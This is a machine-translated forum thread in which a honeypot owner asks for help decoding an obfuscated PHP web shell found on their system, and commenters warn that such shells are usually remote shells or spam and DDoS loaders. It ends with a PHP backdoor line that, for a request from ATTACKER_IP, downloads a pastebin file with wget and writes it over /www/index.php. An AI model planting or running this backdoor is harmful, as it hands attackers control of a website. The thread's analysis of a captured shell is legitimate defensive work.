除臭此PHP外壳攻击

我的一个蜜罐系统上有一个非常有趣的PHP shell，我一直在尝试对它进行解码，但是我没有任何机会获得脚本中GZB64编码部分的内容

也许有更多经验的人可以看看它

这是他们用来下载到我的蜜罐的原始pastebin：

我试图通过在不同的地方打印变量来实现它，但我一辈子都无法打印出内容

以下是我试图让它更具可读性的尝试：

---

要理解代码，您需要知道用户正在使用的l_u_u的值。这样，l_uuul_u和l_uul_u用于为l_ul_u生成一个新值，即用于创建函数的gzdeflated字符串。否。不仅仅是因为我不想为你做你的工作，尽管这是很重要的一部分。我以前做过这件事，结果总是要么是一个远程shell，要么是一个包含来自其他地方的代码的脚本，这些代码要么尝试DDoS攻击，要么发送垃圾邮件。kainaw，我尝试过打印所有这些代码，但它们都打印为空。Sammitch，这就是为什么您应该始终使用沙箱来运行这样的php代码。永远不要在重要的系统上运行这样的代码！如果有人想帮忙，请告诉我。给我一点时间，我会在生产中运行；）

<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {@system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>